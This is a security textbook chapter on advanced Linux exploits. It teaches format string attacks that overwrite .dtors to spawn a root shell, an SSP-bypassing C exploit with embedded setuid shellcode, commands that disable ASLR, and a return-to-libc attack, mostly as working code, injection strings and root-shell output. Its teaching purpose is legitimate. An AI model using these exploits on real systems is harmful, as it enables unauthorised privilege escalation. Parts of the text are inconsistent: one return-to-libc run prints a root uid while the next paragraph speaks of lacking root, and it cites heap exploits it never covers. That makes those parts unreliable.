CHAPTER 12
Advanced Linux Exploits

Now that you have the basics under your belt from reading Chapter 11, you are ready to study more advanced Linux exploits. The field is advancing constantly, and there are always new techniques discovered by the hackers and countermeasures implemented by developers. No matter which side you approach the problem from, you need to move beyond the basics. That said, we can only go so far in this book; your journey is only beginning. The “References” sections will give you more destinations to explore.

In this chapter, we cover the following types of advanced Linux exploits:

• Format string exploits

• Memory protection schemes

Format String Exploits

Format string exploits became public in late 2000. Unlike buffer overflows, format string errors are relatively easy to spot in source code and binary analysis. Once spotted, they are usually eradicated quickly. Because they are more likely to be found by automated processes, as discussed in later chapters, format string errors appear to be on the decline. That said, it is still good to have a basic understanding of them because you never know what will be found tomorrow. Perhaps you might find a new format string error!

The Problem

Format strings are found in format functions; that is, a format function may behave in many different ways depending on the format string it is given. Following are some of the many format functions that exist (see the “References” section for a more complete list):

printf() Prints output to the standard output stream (stdout, usually the screen)

fprintf() Prints output to a file stream

sprintf() Prints output to a string

snprintf() Prints output to a string with length checking built in

Format Strings

As you may recall from Chapter 10, the printf() function may have any number of arguments. We will discuss two forms here:


   printf(<format string>, <list of variables/values>);
   printf(<user supplied string>);

The first form is the most secure way to use the printf() function because the programmer explicitly specifies how the function is to behave by using a format string (a series of characters and special format tokens).

Table 12-1 introduces two more format tokens, %hn and <number>$, that may be used in a format string (the four originally listed in Table 10-4 are included for your convenience).

The Correct Way

Recall the correct way to use the printf() function. For example, the following code:


   //fmt1.c
   #include <stdio.h>
   int main(void) {
     printf("This is a %s.\n", "test");
   }

produces the following output:


   $gcc -o fmt1 fmt1.c
   $./fmt1
   This is a test.

The Incorrect Way

Now take a look at what happens if we forget to add a value for the %s to replace:


   // fmt2.c
   #include <stdio.h>
   int main(void) {
     printf("This is a %s.\n");
   }
   $ gcc -o fmt2 fmt2.c
   $./fmt2
   This is a fy¿.

Table 12-1 Commonly Used Format Symbols

What was that? Looks like Greek, but actually, it’s machine language (binary), shown in ASCII. In any event, it is probably not what you were expecting. To make matters worse, consider what happens if the second form of printf() is used like this:


   //fmt3.c
   #include <stdio.h>
   int main(int argc, char * argv[]){
     printf(argv[1]);
   }

If the user runs the program like this, all is well:


   $gcc -o fmt3 fmt3.c
   $./fmt3 Testing
   Testing#

The cursor is at the end of the line because we did not use a \n newline as before. But what if the user supplies a format string as input to the program?


   $gcc -o fmt3 fmt3.c
   $./fmt3 Testing%s
   TestingYyy´¿y#

Wow, it appears that we have the same problem. However, it turns out this latter case is much more deadly because it may lead to total system compromise. To find out what happened here, we need to learn how the stack operates with format functions.

Stack Operations with Format Functions

To illustrate the function of the stack with format functions, we will use the following program:


   //fmt4.c
   #include <stdio.h>
   int main(void){
      int one=1, two=2, three=3;
      printf("Testing %d, %d, %d!\n", one, two, three);
   }
   $gcc -o fmt4 fmt4.c
   $./fmt4
   Testing 1, 2, 3!

During execution of the printf() function, the stack looks like Figure 12-1.

As always, the parameters of the printf() function are pushed on the stack in reverse order, as shown in Figure 12-1. The format string is passed by address, whereas integer arguments such as one, two, and three are passed by value. The printf() function maintains an internal pointer that starts out pointing to the format string (or top of the stack frame) and then begins to print characters of the format string to standard output (the screen in this case) until it comes upon a special character.

Figure 12-1 Depiction of the stack when printf() is executed

If the % is encountered, the printf() function expects a format token to follow and thus increments an internal pointer (toward the bottom of the stack frame) to grab input for the format token (either a variable or absolute value). Therein lies the problem: the printf() function has no way of knowing if the correct number of variables or values were placed on the stack for it to operate. If the programmer is sloppy and does not supply the correct number of arguments, or if the user is allowed to present their own format string, the function will happily move down the stack (higher in memory), grabbing the next value to satisfy the format string requirements. So what we saw in our previous examples was the printf() function grabbing the next value on the stack and returning it where the format token required.


NOTE

The \ is handled by the compiler and used to escape the next character after the \. This is a way to present special characters to a program and not have them interpreted literally. However, if a \x is encountered, then the compiler expects hexadecimal digits to follow and converts them to the corresponding byte value before processing.


Implications

The implications of this problem are profound indeed. In the best case, the stack value may contain a random hex number that is interpreted as an out-of-bounds address by the format function, causing the process to have a segmentation fault. An attacker could use this to cause a denial-of-service condition.

In the worst case, however, a careful and skillful attacker may be able to use this fault to both read arbitrary data and write data to arbitrary addresses. In fact, if the attacker can overwrite the correct location in memory, the attacker may be able to gain root privileges.

Example Vulnerable Program

For the remainder of this section, we will use the following piece of vulnerable code to demonstrate the possibilities:


   //fmtstr.c
   #include <stdio.h>
   #include <stdlib.h>
   #include <string.h>
   int main(int argc, char *argv[]){
           static int canary=0;   // stores the canary value in .data section
           char temp[2048];       // string to hold large temp string
           strcpy(temp, argv[1]);   // take argv1 input and jam into temp
           printf(temp);            // print value of temp
           printf("\n");            // print carriage return
           printf("Canary at 0x%08x = 0x%08x\n", &canary, canary); //print canary
   }
   #gcc -o fmtstr fmtstr.c
   #./fmtstr Testing
   Testing
   Canary at 0x08049440 = 0x00000000 
   #chmod u+s fmtstr
   #su joeuser
   $


NOTE

The “Canary” value is just a placeholder for now. It is important to realize that your value will certainly be different. For that matter, your system may produce different values for all the examples in this chapter; however, the results should be the same.


Reading from Arbitrary Memory

We will now begin to take advantage of the vulnerable program. We will start slowly and then pick up speed. Buckle up, here we go!

Using the %x Token to Map Out the Stack

As shown in Table 12-1, the %x format token is used to provide a hex value. So, by supplying a few %08x tokens to our vulnerable program, we should be able to dump the stack values to the screen:


   $ ./fmtstr "AAAA %08x %08x %08x %08x"
   AAAA bffffd2d 00000648 00000774 41414141
   Canary at 0x08049440 = 0x00000000
   $

The 08 pads each hex value with leading zeros to a minimum width of eight characters (one per hex digit of a 32-bit value). Notice that the format string itself was stored on the stack, proven by the presence of our AAAA (0x41414141) test string. The fact that the fourth item shown (from the stack) was our format string depends on the nature of the format function used and the location of the vulnerable call in the vulnerable program. To find this value, simply use brute force and keep increasing the number of %08x tokens until the beginning of the format string is found. For our simple example (fmtstr), the distance, called the offset, is defined as 4.

Using the %s Token to Read Arbitrary Strings

Because we control the format string, we can place anything in it we like (well, almost anything). For example, if we wanted to read the value of the address located in the fourth parameter, we could simply replace the fourth format token with a %s, as shown:


   $ ./fmtstr "AAAA %08x %08x %08x %s"
   Segmentation fault
   $

Why did we get a segmentation fault? Because, as you recall, the %s format token will take the next parameter on the stack, in this case the fourth one, and treat it like a memory address to read from (by reference). In our case, the fourth value is AAAA, which is translated in hex to 0x41414141, which (as we saw in the previous chapter) causes a segmentation fault.

Reading Arbitrary Memory

So how do we read from arbitrary memory locations? Simple: we supply valid addresses within the segment of the current process. We will use the following helper program to assist us in finding a valid address:


   $ cat getenv.c
   #include <stdio.h>
   #include <stdlib.h>
   int main(int argc, char *argv[]){
           char * addr;  //pointer to hold the address of the variable's value
           addr = getenv(argv[1]);  //look up the variable named in argv[1]
           printf("%s is located at %p\n", argv[1], addr);//display location
   }
   $ gcc -o getenv getenv.c

The purpose of this program is to fetch the location of environment variables from the system. To test this program, let’s check for the location of the SHELL variable, which stores the location of the current user’s shell:


   $ ./getenv SHELL
   SHELL is located at 0xbffffd84

Now that we have a valid memory address, let’s try it. First, remember to reverse the memory location because this system is little-endian:


   $ ./fmtstr `printf "\x84\xfd\xff\xbf"`" %08x %08x %08x %s"
   ýÿ¿ bffffd2f 00000648 00000774 /bin/bash
   Canary at 0x08049440 = 0x00000000

Success! We were able to read up to the first NULL character of the address given (the SHELL environment variable). Take a moment to play with this now and check out other environment variables. To dump all environment variables for your current session, type env | more at the shell prompt.

Simplifying the Process with Direct Parameter Access

To make things even easier, you may even access the fourth parameter from the stack by what is called direct parameter access. The #$ format token (where # is the number of the parameter) is used to direct the format function to jump over a number of parameters and select one directly. For example:


   $cat dirpar.c
   //dirpar.c
   #include <stdio.h>
   int main(void){
      printf ("This is a %3$s.\n", 1, 2, "test");
   }
   $gcc -o dirpar dirpar.c
   $./dirpar
   This is a test.
   $

Now when you use the direct parameter format token from the command line, you need to escape the $ with a \ in order to keep the shell from interpreting it. Let’s put this all to use and reprint the location of the SHELL environment variable:


   $ ./fmtstr `printf "\x84\xfd\xff\xbf"`"%4\$s"
   ýÿ¿/bin/bash
   Canary at 0x08049440 = 0x00000000

Notice how short the format string can be now.


CAUTION

The preceding format works for bash. Other shells such as tcsh require other formats; for example:


   $ ./fmtstr `printf "\x84\xfd\xff\xbf"`'%4$s'

Notice the use of a single quote on the end. To make the rest of the chapter’s examples easy, use the bash shell.


Writing to Arbitrary Memory

For this example, we will try to overwrite the canary address 0x08049440 with the address of shellcode (which we will store in memory for later use). We will use this address because it is visible to us each time we run fmtstr, but later we will see how we can overwrite nearly any address.

Magic Formula

As shown by Blaess, Grenier, and Raynal (see “References”), the easiest way to write 4 bytes in memory is to split it up into two chunks (two high-order bytes and two low-order bytes) and then use the #$ and %hn tokens to put the two values in the right place.

For example, let’s put our shellcode from the previous chapter into an environment variable and retrieve the location:


   $ export SC=`cat sc`
   $ ./getenv SC
   SC is located at 0xbfffff50   !!!!!!yours will be different!!!!!!

If we wish to write this value into memory, we would split it into two values:

• Two high-order bytes (HOB): 0xbfff

• Two low-order bytes (LOB): 0xff50

As you can see, in our case, HOB is less than (<) LOB, so follow the first column in Table 12-2.

Now comes the magic. Table 12-2 presents the formula to help you construct the format string used to overwrite an arbitrary address (in our case, the canary address, 0x08049440).

Table 12-2 The Magic Formula to Calculate Your Exploit Format String

Using the Canary Value to Practice

Using Table 12-2 to construct the format string, let’s try to overwrite the canary value with the location of our shellcode.


CAUTION

At this point, you must understand that the names of our programs (getenv and fmtstr) need to be the same length. This is because the program name is stored on the stack on startup, and therefore the two programs will have different environments (and locations of the shellcode in this case) if their names are of different lengths. If you named your programs something different, you will need to play around and account for the difference or simply rename them to the same size for these examples to work.


To construct the injection buffer to overwrite the canary address 0x08049440 with 0xbfffff50, follow the formula in Table 12-2. Values are calculated for you in the right column and used here:


   $ ./fmtstr `printf
   "\x42\x94\x04\x08\x40\x94\x04\x08"`%.49143x%4\$hn%.16209x%5\$hn
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   0000000000000000000000000
   <truncated>
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000648
   Canary at 0x08049440 = 0xbfffff50


CAUTION

Once again, your values will be different. Start with the getenv program, and then use Table 12-2 to get your own values. Also, there is actually no new line between the printf and the double quote.


Taking .dtors to root

Okay, so what? We can overwrite a staged canary value...big deal. It is a big deal because some locations are executable and, if overwritten, may lead to system redirection and execution of your shellcode. We will look at one of many such locations, called .dtors.

ELF32 File Format

When the GNU compiler creates binaries, they are stored in ELF32 file format. This format allows for many tables to be attached to the binary. Among other things, these tables are used to store pointers to functions the file may need often. There are two tools you may find useful when dealing with binary files:

nm Used to list the symbols of the ELF32 format file along with their addresses

objdump Used to dump and examine the individual sections of the file

Let’s start with the nm tool:


   $ nm ./fmtstr |more
   08049448 D _DYNAMIC
   08049524 D _GLOBAL_OFFSET_TABLE_
   08048410 R _IO_stdin_used
            w _Jv_RegisterClasses
   08049514 d __CTOR_END__
   08049510 d __CTOR_LIST__
   0804951c d __DTOR_END__
   08049518 d __DTOR_LIST__
   08049444 d __EH_FRAME_BEGIN__
   08049444 d __FRAME_END__
   08049520 d __JCR_END__
   08049520 d __JCR_LIST__
   08049540 A __bss_start
   08049434 D __data_start
   080483c8 t __do_global_ctors_aux
   080482f4 t __do_global_dtors_aux
   08049438 d __dso_handle
            w __gmon_start__
            U __libc_start_main@@GLIBC_2.0
   08049540 A _edata
   08049544 A _end
   <truncated>

And to view a section, say .dtors, you would simply use the objdump tool:


   $ objdump -s -j .dtors ./fmtstr

   ./fmtstr:          file format elf32-i386

   Contents of section .dtors:
    8049518 ffffffff 00000000                  ........
   $

DTOR Section

In C/C++, the destructor (DTOR) section provides a way to ensure that some process is executed upon program exit. For example, if you wanted to print a message every time the program exited, you would use the destructor section. The DTOR section is stored in the binary itself, as shown in the preceding nm and objdump command output. Notice how an empty DTOR section always starts and ends with 32-bit markers: 0xffffffff and 0x00000000 (NULL). In the preceding fmtstr case, the table is empty.

Compiler directives are used to denote the destructor as follows:


   $ cat dtor.c
   //dtor.c
   #include <stdio.h>
   #include <stdlib.h>

   static void goodbye(void) __attribute__ ((destructor));

   int main(void){
    printf("During the program, hello\n");
    exit(0);
   }

   void goodbye(void){
           printf("After the program, bye\n");
   }
   $ gcc -o dtor dtor.c
   $ ./dtor
   During the program, hello
   After the program, bye

Now let’s take a closer look at the file structure by using nm and grepping for the pointer to the goodbye() function:


   $ nm ./dtor | grep goodbye
   08048386 t goodbye

Next, let’s look at the location of the DTOR section in the file:


   $ nm ./dtor |grep DTOR
   08049508 d __DTOR_END__
   08049500 d __DTOR_LIST__

Finally, let’s check the contents of the .dtors section:


   $ objdump -s -j .dtors ./dtor
   ./dtor:  file format elf32-i386
   Contents of section .dtors:
   8049500 ffffffff 86830408 00000000        ............
   $

Yep, as you can see, a pointer to the goodbye() function is stored in the DTOR section between the 0xffffffff and 0x00000000 markers. Again, notice the little-endian notation.

Putting It All Together

Now back to our vulnerable format string program, fmtstr. Recall the location of the DTORS section:


   $ nm ./fmtstr |grep DTOR   #notice how we are only interested in DTOR
   0804951c d __DTOR_END__
   08049518 d __DTOR_LIST__

and the initial values (empty):


   $ objdump -s -j .dtors ./fmtstr
   ./fmtstr:  file format elf32-i386
   Contents of section .dtors:
    8049518 ffffffff 00000000        ........
   $

It turns out that if we overwrite either an existing function pointer in the DTOR section or the ending marker (0x00000000) with our target return address (in this case, our shellcode address), the program will happily jump to that location and execute. To get the first pointer location or the end marker, simply add 4 bytes to the __DTOR_LIST__ location. In our case, this is

0x08049518 + 4 = 0x0804951c (which goes in our second memory slot in the following command)

Follow the same first column of Table 12-2 to calculate the required format string to overwrite the new memory address 0x0804951c with the same address of the shellcode as used earlier: 0xbfffff50 in our case. Here goes!


   $  ./fmtstr `printf
   "\x1e\x95\x04\x08\x1c\x95\x04\x08"`%.49143x%4\$hn%.16209x%5\$hn
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000
   <truncated>
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   0000000000000000000000000000648
   Canary at 0x08049440 = 0x00000000
   sh-2.05b# whoami
   root
   sh-2.05b# id -u
   0
   sh-2.05b# exit
   exit
   $

Success! Relax, you earned it.

There are many other useful locations to overwrite; for example:

• Global offset table

• Global function pointers

• atexit handlers

• Stack values

• Program-specific authentication variables

And there are many more; see “References” for more ideas.

References

Exploiting Software: How to Break Code (Greg Hoglund and Gary McGraw) Addison-Wesley, 2004

Hacking: The Art of Exploitation (Jon Erickson) No Starch Press, 2003

“Overwriting the .dtors Section” (Juan M. Bello Rivas) www.cash.sopot.kill.pl/bufer/dtors.txt

“Secure Programming, Part 4: Format Strings” (Blaess, Grenier, and Raynal) www.cgsecurity.org/Articles/SecProg/Art4/

The Shellcoder’s Handbook: Discovering and Exploiting Security Holes (Jack Koziol et al.) Wiley, 2004

“When Code Goes Wrong – Format String Exploitation” (DangerDuo) www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=7949&mode=thread&order=0&thold=0

Memory Protection Schemes

Since buffer overflows and heap overflows first appeared, many programmers have developed memory protection schemes to prevent these attacks. As we will see, some work, some don’t.

Compiler Improvements

Several improvements have been made to the gcc compiler, starting in GCC 4.1.

Libsafe

Libsafe is a dynamic library that allows for the safer implementation of the following dangerous functions:

• strcpy()

• strcat()

• sprintf(), vsprintf()

• getwd()

• gets()

• realpath()

• fscanf(), scanf(), sscanf()

Libsafe overrides these dangerous libc functions, substituting implementations that perform bounds checking and input scrubbing, thereby eliminating most stack-based attacks. However, there is no protection offered against the heap-based exploits described in this chapter.

StackShield, StackGuard, and Stack Smashing Protection (SSP)

StackShield is a replacement for the gcc compiler that catches unsafe operations at compile time. Once installed, the user simply issues shieldgcc instead of gcc to compile programs. In addition, when a function is called, StackShield copies the saved return address to a safe location and restores the return address upon returning from the function.

StackGuard was developed by Crispin Cowan of Immunix.com and is based on a system of placing “canaries” between the stack buffers and the frame state data. If a buffer overflow attempts to overwrite saved eip, the canary will be damaged and a violation will be detected.

Stack Smashing Protection (SSP), formerly called ProPolice, is now developed by Hiroaki Etoh of IBM and improves on the canary-based protection of StackGuard by rearranging the stack variables to make them more difficult to exploit. In addition, a new prolog and epilog are implemented with SSP.

The following is the previous prolog:

Image

The new prolog is

Image

As shown in Figure 12-2, a pointer is provided to ArgC and checked after the return of the application, so the key is to control that pointer to ArgC, instead of saved Ret.

Because of this new prolog, a new epilog is created:

Image

Back in Chapter 11, we discussed how to handle overflows of small buffers by using the end of the environment segment of memory. Now that we have a new prolog and epilog, we need to insert a fake frame including a fake Ret and fake ArgC, as shown in Figure 12-3.

Figure 12-2 Old and new prolog

Figure 12-3 Using a fake frame to attack small buffers

Using this fake frame technique, we can control the execution of the program by jumping to the fake ArgC, which will use the fake Ret address (the actual address of the shellcode). The source code of such an attack follows:


   $ cat exploit2.c
   //exploit2.c  works locally when the vulnerable buffer is small.
   #include <stdlib.h>
   #include <stdio.h>
   #include <unistd.h>
   #include <string.h>

   #define VULN "./smallbuff"
   #define SIZE 14

   /************************************************
    * The following format is used
    * &shellcode (eip) - must point to the shell code address
    * argc - not really using the contents here
    * shellcode
    * ./smallbuff
    ************************************************/
   char shellcode[] =  //Aleph1's famous shellcode, see ref.
     "\xff\xff\xff\xff\xff\xff\xff\xff" // place holder for &shellcode and argc
     "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
   int main(int argc, char **argv){
      // injection buffer
      char p[SIZE];
      // put the shellcode in target's envp
      char *env[] = { shellcode, NULL };
      int *ptr, i, addr,addr_argc,addr_eip;
      // calculate the exact location of the shellcode
      addr = 0xbffffffa - strlen(shellcode) - strlen(VULN);
      addr += 4;
      addr_argc = addr;
      addr_eip = addr_argc + 4;
      fprintf(stderr, "[***] using fake argc address: %#010x\n", addr_argc);
      fprintf(stderr, "[***] using shellcode address: %#010x\n", addr_eip);
      // set the address for the modified argc
      shellcode[0] = (unsigned char)(addr_eip & 0x000000ff);
      shellcode[1] = (unsigned char)((addr_eip & 0x0000ff00)>>8); 
      shellcode[2] = (unsigned char)((addr_eip & 0x00ff0000)>>16);
      shellcode[3] = (unsigned char)((addr_eip & 0xff000000)>>24);

   /* fill buffer with computed address */
   /* alignment issues, must offset by two */
      p[0]='A';
      p[1]='A';
      ptr = (int * )&p[2];
      
      for (i = 2; i < SIZE; i += 4){
         *ptr++ = addr;
      }
      /* this is the address for exploiting with
       * gcc -mpreferred-stack-boundary=2 -o smallbuff smallbuff.c */
      *ptr = addr_eip;

      //call the program with execle, which takes the environment as input
      execle(VULN,"smallbuff",p,NULL, env);
      exit(1);
   }


NOTE

The preceding code actually works for both cases, with and without stack protection on. This is a coincidence, due to the fact that it takes 4 bytes less to overwrite the pointer to ArgC than it did to overwrite saved Ret under the previous way of performing buffer overflows.


The preceding code can be executed as follows:


   # gcc -o exploit2 exploit2.c
   #chmod u+s exploit2
   #su joeuser //switch to a normal user (any)
   $ ./exploit2
   [***] using fake argc address: 0xbfffffc2
   [***] using shellcode address: 0xbfffffc6
   sh-2.05b# whoami
   root
   sh-2.05b# exit
   exit
   $exit

SSP has been incorporated in GCC (starting in version 4.1) and is enabled by default on many distributions. It may be disabled with the -fno-stack-protector flag.

You may check for the use of SSP by using the objdump tool:


   joe@BT(/tmp):$ objdump -d test | grep stack_chk_fail
   080482e8 <__stack_chk_fail@plt>:
    80483f8:  e8 eb fe ff ff  call  80482e8 <__stack_chk_fail@plt>

Notice the call to the __stack_chk_fail@plt function, compiled into the binary.


NOTE

As implied by their names, none of the tools described in this section offers any protection against heap-based attacks.


Non-Executable Stack (gcc based)

GCC has implemented a non-executable stack, using the GNU_STACK ELF markings. This feature is on by default (starting in version 4.1) and may be disabled with the -z execstack flag, as shown here:


   joe@BT(/tmp):$ gcc -o test test.c && readelf -l test | grep -i stack
     GNU_STACK  0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
   joe@BT(/tmp):$ gcc -z execstack -o test test.c && readelf -l test | grep -i stack
     GNU_STACK  0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4

Notice that in the first command the RW flag is set in the ELF markings, and in the second command (with the -z execstack flag) the RWE flag is set in the ELF markings. The flags stand for read (R), write (W), and execute (E).

Kernel Patches and Scripts

There are many protection schemes introduced by kernel-level patches and scripts; however, we will mention only a few of them.

Non-Executable Memory Pages (Stacks and Heaps)

Early on, developers realized that program stacks and heaps should not be executable and that user code should not be writable once it is placed in memory. Several implementations have attempted to achieve these goals.

The Page-eXec (PaX) patches attempt to provide execution control over the stack and heap areas of memory by changing the way memory paging is done. Normally, page table entries (PTEs) keep track of the pages of memory, and caching mechanisms called data and instruction translation look-aside buffers (TLBs) store recently accessed memory pages and are checked by the processor first when accessing memory. If the TLB caches do not contain the requested memory page (a cache miss), then the PTE is used to look up and access the memory page. The PaX patch implements a set of state tables for the TLB caches and maintains whether a memory page is in read/write mode or execute mode. As the memory pages transition from read/write mode into execute mode, the patch intervenes, logging and then killing the process making this request. PaX has two methods to accomplish non-executable pages. The SEGMEXEC method is faster and more reliable, but splits the user space in half to accomplish its task. When needed, PaX uses a fallback method, PAGEEXEC, which is slower but also very reliable.

Red Hat Enterprise Server and Fedora offer the ExecShield implementation of non-executable memory pages. Although quite effective, it has been found to be vulnerable under certain circumstances and to allow data to be executed.

Address Space Layout Randomization (ASLR)

The intent of ASLR is to randomize the following memory objects:

• Executable image

• Brk()-managed heap

• Library images

• Mmap()-managed heap

• User space stack

• Kernel space stack

PaX, in addition to providing non-executable pages of memory, fully implements the preceding ASLR objectives. grsecurity (a collection of kernel-level patches and scripts) incorporates PaX and has been incorporated into a number of Linux distributions. Red Hat and Fedora use a Position Independent Executable (PIE) technique to implement ASLR. This technique offers less randomization than PaX, although they protect the same memory areas. Systems that implement ASLR provide a high level of protection from “return into libc” exploits by randomizing where the libc functions are located in memory. This is done by randomizing the addresses returned by mmap() and makes finding the pointer to system() and other functions nearly impossible. However, using brute-force techniques to find function calls like system() is possible.

On Debian- and Ubuntu-based systems, the following command can be used to disable ASLR:


  root@quazi(/tmp):# echo 0 > /proc/sys/kernel/randomize_va_space

On Red Hat–based systems, the following commands can be used to disable ASLR:


   root@quazi(/tmp):# echo 0 > /proc/sys/kernel/exec-shield
   root@quazi(/tmp):# echo 0 > /proc/sys/kernel/exec-shield-randomize

Return to libc Exploits

“Return to libc” is a technique that was developed to get around non-executable stack memory protection schemes such as PaX and ExecShield. Basically, the technique uses the controlled eip to return execution into existing glibc functions instead of shellcode. Remember, glibc is the ubiquitous library of C functions used by all programs. The library has functions like system() and exit(), both of which are valuable targets. Of particular interest is the system() function, which is used to run programs on the system. All you need to do is munge (shape or change) the stack to trick the system() function into calling a program of your choice, say /bin/sh.

To make the proper system() function call, we need our stack to look like this:

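   [overflow filler][&system()][Filler][&"/bin/sh"]

(Lower addresses are on the left; the address of system() overwrites the saved eip.)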

We will overflow the vulnerable buffer and exactly overwrite the old saved eip with the address of the glibc system() function. When our vulnerable main() function returns, the program will return into the system() function as this value is popped off the stack into the eip register and executed. At this point, the system() function will be entered and the system() prolog will be called, which will build another stack frame on top of the position marked “Filler,” which for all intents and purposes will become our new saved eip (to be executed after the system() function returns). Now, as you would expect, the arguments for the system() function are located just below the new saved eip (marked “Filler” in the diagram). Since the system() function is expecting one argument (a pointer to the string of the filename to be executed), we will supply the pointer of the string “/bin/sh” at that location. In this case, we don’t actually care what we return to after the system function executes. If we did care, we would need to be sure to replace Filler with a meaningful function pointer like exit().

Let’s look at an example on a Slax bootable CD (BackTrack v.2.0):


   BT book $ uname -a
   Linux BT 2.6.18-rc5 #4 SMP Mon Sep 18 17:58:52 GMT 2006 i686 i686 i386 GNU/Linux
   BT book $ cat /etc/slax-version
   SLAX 6.0.0



NOTE

Stack randomization makes these types of attacks very hard (not impossible) to do. Basically, brute force needs to be used to guess the addresses involved, which greatly reduces your odds of success. As it turns out, the randomization varies from system to system and is not truly random.


Start by switching user to root and turning off stack randomization:


   BT book $ su
   Password: ****
   BT book # echo 0 > /proc/sys/kernel/randomize_va_space

Take a look at the following vulnerable program:


   BT book # cat vuln2.c
   /* small buf vuln prog */
   #include <string.h>
   int main(int argc, char * argv[]){
    char buffer[7];
    strcpy(buffer, argv[1]);
    return 0;
   }

As you can see, this program is vulnerable because the strcpy() call copies argv[1] into the small buffer without checking its length. Compile the vulnerable program, set it as SUID, and return to a normal user account:


   BT book # gcc  -o vuln2 vuln2.c
   BT book # chown root.root vuln2
   BT book # chmod +s vuln2
   BT book # ls -l vuln2
   -rwsr-sr-x 1 root root 8019 Dec 19 19:40 vuln2* 
   BT book # exit
   exit
   BT book $

Now we are ready to build the “return to libc” exploit and feed it to the vuln2 program. We need the following items to proceed:

• Address of glibc system() function

• Address of the string “/bin/sh”

It turns out that functions like system() and exit() are automatically linked into binaries by the gcc compiler. To observe this fact, start the program with gdb in quiet mode. Set a breakpoint on main(), and then run the program. When the program halts on the breakpoint, print the location of the glibc function called system().


   BT book $ gdb  -q vuln2
   Using host libthread_db library "/lib/tls/libthread_db.so.1".
   (gdb) b main
   Breakpoint 1 at 0x80483aa
   (gdb) r
   Starting program: /mnt/sda1/book/book/vuln2

   Breakpoint 1, 0x080483aa in main ()
   (gdb) p system
   $1 = {<text variable, no debug info>} 0xb7ed86e0 <system>
   (gdb) q
   The program is running.  Exit anyway? (y or n) y
   BT book $

Another cool way to get the locations of functions and strings in a binary is by searching the binary with a custom program as follows:


   BT book $ cat search.c

   /* Simple search routine, based on Solar Designer's lpr exploit.  */
   #include <stdio.h>
   #include <stdlib.h>
   #include <string.h>
   #include <dlfcn.h>
   #include <signal.h>
   #include <setjmp.h>

   int step;
   jmp_buf env;

   void fault() {
      if (step<0)
         longjmp(env,1);
      else {
         printf("Can't find /bin/sh in libc, use env instead...\n");
         exit(1);
      }
   }

   int main(int argc, char **argv) {
      void *handle;
      int *sysaddr, *exitaddr;
      long shell; 
      char examp[512];
      char *args[3];
      char *envs[1];
      long *lp;
      
      handle=dlopen(NULL,RTLD_LOCAL);

      *(void **)(&sysaddr)=dlsym(handle,"system");
      sysaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address
      printf("system() found at %08x\n",sysaddr);

      *(void **)(&exitaddr)=dlsym(handle,"exit");
      exitaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address
      printf("exit() found at %08x\n",exitaddr);

      // Now search for /bin/sh using Solar Designer's approach
      if (setjmp(env))
         step=1;
      else
         step=-1;
      shell=(int)sysaddr;
      signal(SIGSEGV,fault);
      do
         while (memcmp((void *)shell, "/bin/sh", 8)) shell+=step;
      //check for null byte
      while (!(shell & 0xff) || !(shell & 0xff00) || !(shell & 0xff0000)
            || !(shell & 0xff000000));
      printf("\"/bin/sh\" found at %08x\n",shell+16384); // 16384=0x4000=base addr
   }

The preceding program uses the dlopen() and dlsym() functions to look up objects and symbols located in the binary. Once the system() function is located, the memory is searched in both directions, looking for the existence of the “/bin/sh” string. The “/bin/sh” string can be found embedded in glibc, which in this case keeps the attacker from depending on access to environment variables to complete the attack. Finally, the value is checked to see if it contains a NULL byte and the location is printed. You may customize the preceding program to look for other objects and strings. Let’s compile the preceding program and test-drive it:


   BT book $
   BT book $ gcc -o search -ldl search.c
   BT book $ ./search
   system() found at b7ed86e0
   exit() found at b7ece3a0
   "/bin/sh" found at b7fc04c7

A quick check of the preceding gdb value shows the same location for the system() function: success!

We now have everything required to successfully attack the vulnerable program using the return to libc exploit. Putting it all together, we see the following:


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   "\xe0\x86\xed\xb7","BBBB","\xc7\x04\xfc\xb7"'`
   sh-3.1$ id
   uid=1001(joe) gid=100(users) groups=100(users)
   sh-3.1$ exit 
   exit
   Segmentation fault
   BT book $

Notice that we got a user-level shell (not root), and when we exited from the shell, we got a segmentation fault. Why did this happen? The program crashed when we left the user-level shell because the filler we supplied (0x42424242) became the saved eip to be executed after the system() function. So, a crash was the expected behavior when the program ended. To avoid that crash, we will simply supply the pointer to the exit() function in that filler location:


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   "\xe0\x86\xed\xb7","\xa0\xe3\xec\xb7","\xc7\x04\xfc\xb7"'`
   sh-3.1# id
   uid=0(root) gid=0(root) groups=100(users)
   sh-3.1# exit
   exit
   BT book $

As for the lack of root privilege, the shell started by system() drops its elevated privileges: system() runs /bin/sh, and bash resets the effective user ID when it differs from the real one. To get around this, we need to use a wrapper program that sets the real user and group IDs to 0 before making the system() call. Then, we will call the wrapper program with the execl() function, which does not drop privileges. The wrapper will look like this:


   BT book $ cat wrapper.c
   #include <stdlib.h>
   #include <unistd.h>
   int main(){
      setuid(0);
      setgid(0);
      system("/bin/sh");
   }
   BT book $ gcc -o wrapper wrapper.c

Notice that we do not need the wrapper program to be SUID. Now we need to call the wrapper with the execl() function like this:


   execl("./wrapper", "./wrapper", NULL)

